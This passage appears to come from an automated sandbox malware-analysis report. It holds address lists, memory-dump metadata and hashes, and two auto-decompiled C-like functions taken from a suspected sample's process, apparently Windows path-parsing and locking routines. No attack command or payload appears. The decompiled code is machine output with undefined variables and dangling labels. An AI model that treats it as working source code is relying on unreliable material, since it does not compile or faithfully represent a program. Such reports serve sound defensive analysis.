0x01315f30
0x01315f31
0x01315f37
0x01315f3a
0x01315f3d
0x01315f44
0x00000000
0x00000000
0x00000000
0x01315f46
0x01315f48
0x01315f4d
0x00000000
0x01315f4d
0x01315dda
0x01315ddf
0x00000000
0x01315ddf
0x01315dd8
0x01315da7
0x01315da9
0x01315dac
0x01315dae
0x00000000
0x01315db4
0x01315db4
0x00000000
0x01315db4
0x01315dae
0x01315d88
0x01315d8d
0x01316363
0x01316369
0x0131636a
0x01316370
0x01316372
0x0131637a
0x0131637b
0x0131637d
0x00000000
0x00000000
0x0131637f
0x01316385
0x00000000
0x01316385
0x01315d38
0x01315d3b
0x00000000
0x00000000
0x00000000
0x01315d3b
0x01315d27
0x01315d29
0x00000000
0x00000000
0x00000000
0x01316360
0x00000000
0x01316360
0x01315c10
0x01315c10
0x013163da
0x013163e5
0x013163e5

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ecb58df5f7a4d8f74e875cf44eeb47a0ddf3b704573d75a9a75ae9ebd539f30
Instruction ID: e8efd2500ec86f2397a80fd069ba0e9e6b52b923d42028453892653946479ace
Opcode Fuzzy Hash: 1ecb58df5f7a4d8f74e875cf44eeb47a0ddf3b704573d75a9a75ae9ebd539f30
Instruction Fuzzy Hash: D7427DB5D10229CFDB24CF68C881BA9BBB1FF45308F1481AAD94DEB256D7709A85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 01264120 Relevance: .4, Instructions: 444
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E01264120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x133d360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E0127F232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E01266E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L01264620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E01266E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M012645F8))) {
												case 0:
													_v568 = 0x1221078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x12211c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L01264620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E0128F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E0128F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E012452A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E0125EB70(1, 0x13379a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E0125AA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E012895D0();
																			L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E0128B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E01283D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E0128B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}

0x01264128
0x01264135
0x0126413c
0x01264141
0x01264145
0x01264147
0x0126414e
0x01264151
0x01264159
0x0126415c
0x01264160
0x01264164
0x01264168
0x0126416c
0x0126417f
0x01264181
0x0126446a
0x0126446a
0x0126418c
0x01264195
0x01264199
0x01264432
0x01264439
0x0126443d
0x01264442
0x01264447
0x00000000
0x0126419f
0x012641a3
0x012641b1
0x012641b9
0x012641bd
0x012645db
0x012645db
0x00000000
0x012641c3
0x012641c3
0x012641ce
0x012641d4
0x012ae138
0x012ae13e
0x012ae169
0x012ae16d
0x012ae19e
0x012ae16f
0x012ae16f
0x012ae175
0x012ae179
0x012ae18f
0x012ae193
0x00000000
0x012ae199
0x00000000
0x012ae199
0x012ae193
0x00000000
0x00000000
0x00000000
0x012641da
0x012641da
0x012641df
0x012641e4
0x012641ec
0x01264203
0x01264207
0x012ae1fd
0x01264222
0x01264226
0x012ae1f3
0x012ae1f3
0x0126422c
0x0126422c
0x01264233
0x012ae1ed
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x01264239
0x01264239
0x01264239
0x01264239
0x01264233
0x01264226
0x012641ee
0x012641ee
0x012641f4
0x01264575
0x012ae1b1
0x012ae1b1
0x00000000
0x0126457b
0x0126457b
0x01264582
0x012ae1ab
0x00000000
0x00000000
0x00000000
0x00000000
0x01264588
0x01264588
0x0126458c
0x012ae1c4
0x012ae1c4
0x00000000
0x01264592
0x01264592
0x01264599
0x012ae1be
0x00000000
0x00000000
0x00000000
0x00000000
0x0126459f
0x0126459f
0x012645a3
0x012ae1d7
0x012ae1e4
0x00000000
0x012645a9
0x012645a9
0x012645b0
0x012ae1d1
0x00000000
0x00000000
0x00000000
0x00000000
0x012645b6
0x012645b6
0x012645b6
0x00000000
0x012645b6
0x012645b0
0x012645a3
0x01264599
0x0126458c
0x01264582
0x00000000
0x00000000
0x00000000
0x00000000
0x012641f4
0x0126423e
0x01264241
0x012645c0
0x012645c4
0x00000000
0x012645ca
0x012645ca
0x00000000
0x012ae207
0x012ae20f
0x00000000
0x00000000
0x00000000
0x00000000
0x012645d1
0x00000000
0x00000000
0x012645ca
0x00000000
0x01264247
0x01264247
0x01264247
0x01264249
0x01264249
0x01264249
0x01264251
0x01264251
0x01264257
0x0126425f
0x0126426e
0x01264270
0x0126427a
0x012ae219
0x012ae219
0x01264280
0x01264282
0x01264456
0x012645ea
0x00000000
0x012645f0
0x012ae223
0x00000000
0x012ae223
0x0126445c
0x0126445c
0x00000000
0x0126445c
0x00000000
0x01264288
0x0126428c
0x012ae298
0x01264292
0x01264292
0x0126429e
0x012642a3
0x012642a7
0x012642ac
0x012ae22d
0x012642b2
0x012642b2
0x012642b9
0x012642bc
0x012642c2
0x012642ca
0x012642cd
0x012642cd
0x012642d4
0x0126433f
0x0126433f
0x012642d6
0x012642d6
0x012642d9
0x012642dd
0x012642eb
0x012ae23a
0x012642f1
0x01264305
0x0126430d
0x01264315
0x01264318
0x0126431f
0x01264322
0x0126432e
0x0126433b
0x0126433b
0x00000000
0x0126432e
0x012642eb
0x0126434c
0x0126434e
0x01264352
0x01264359
0x0126435e
0x01264361
0x0126436e
0x0126438a
0x0126438e
0x01264396
0x0126439e
0x012643a1
0x012643ad
0x012643bb
0x012643bb
0x012643ad
0x0126436e
0x012643bf
0x012643c5
0x01264463
0x01264463
0x012643ce
0x012643d5
0x012643d9
0x012643df
0x01264475
0x01264479
0x01264491
0x01264491
0x01264479
0x012643e5
0x012643eb
0x012643f4
0x012643f6
0x012643f9
0x012643fc
0x012643ff
0x012644e8
0x012644ed
0x012644f3
0x012ae247
0x00000000
0x012644f9
0x01264504
0x01264508
0x0126450f
0x012ae269
0x00000000
0x01264515
0x01264519
0x01264531
0x01264534
0x01264537
0x0126453e
0x01264541
0x0126454a
0x012ae255
0x012ae255
0x012ae25b
0x012ae25e
0x012ae261
0x012ae261
0x01264555
0x01264559
0x0126455d
0x012ae26d
0x012ae270
0x012ae274
0x012ae27a
0x012ae27d
0x012ae28e
0x012ae28e
0x01264563
0x01264563
0x01264569
0x01264569
0x00000000
0x0126455d
0x0126450f
0x00000000
0x012644f3
0x012643ff
0x01264405
0x01264405
0x01264405
0x012642ac
0x0126428c
0x01264282
0x01264407
0x0126440d
0x012ae2af
0x012ae2af
0x01264413
0x01264413
0x00000000
0x012641d4
0x00000000
0x012641c3
0x012641bd
0x01264415
0x01264415
0x01264416
0x01264417
0x01264429
0x0126416e
0x0126416e
0x01264175
0x01264498
0x0126449f
0x012ae12d
0x00000000
0x012ae133
0x00000000
0x012ae133
0x012644a5
0x012644a5
0x012644aa
0x00000000
0x012644bb
0x012644ca
0x012644d6
0x012644d7
0x012644d8
0x012644e3
0x012644e3
0x012644aa
0x0126417b
0x0126417b
0x0126417b
0x00000000
0x0126417b
0x01264175
0x00000000

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0ceaef860572daec8b79ad0babcec707f7101198484d7963a52dabf5fe1dd33
Instruction ID: 305e996360f9a7673bb3015be378b246573d6c2f7b4a4157fb3cf7b906c1dd17
Opcode Fuzzy Hash: d0ceaef860572daec8b79ad0babcec707f7101198484d7963a52dabf5fe1dd33
Instruction Fuzzy Hash: 2CF1AF706282928FC724EF18C481A3AB7E5FF98714F55492EF6C6CB290E774D891CB52

Uniqueness

Uniqueness Score: -1.00%

Function 012720A0 Relevance: .4, Instructions: 420
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E012720A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x1338714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E01272EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E01272EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E012458EC(_t240);
									_t221 =  *0x1335cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x1335cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E01284A2C(0x1336e40, 0x1284b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E01267D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x1225c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E0127F6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E0127F6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E012C7016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L01262400(_t267 + 0x20);
															}
															L01262400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E01272397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E01262280(_t134, 0x1338608);
									__eflags =  *0x1336e48 - _t253; // 0x0
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E0125FFB0(_t198, _t241, 0x1338608);
										__eflags = _t253;
										if(_t253 != 0) {
											L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x1336e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x1338608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E01276B90(_t210,  &_v64);
										_t262 =  *0x1338608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E0127E180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E012897C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E0128006A(0x1338608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x1338608);
												E0128B180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x1336904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x1336e48; // 0x0
							_v72 = _t229;
							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								E0125FFB0(_t198, _t240, 0x1338608);
								_t253 = _v76;
								goto L29;
							} else {
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
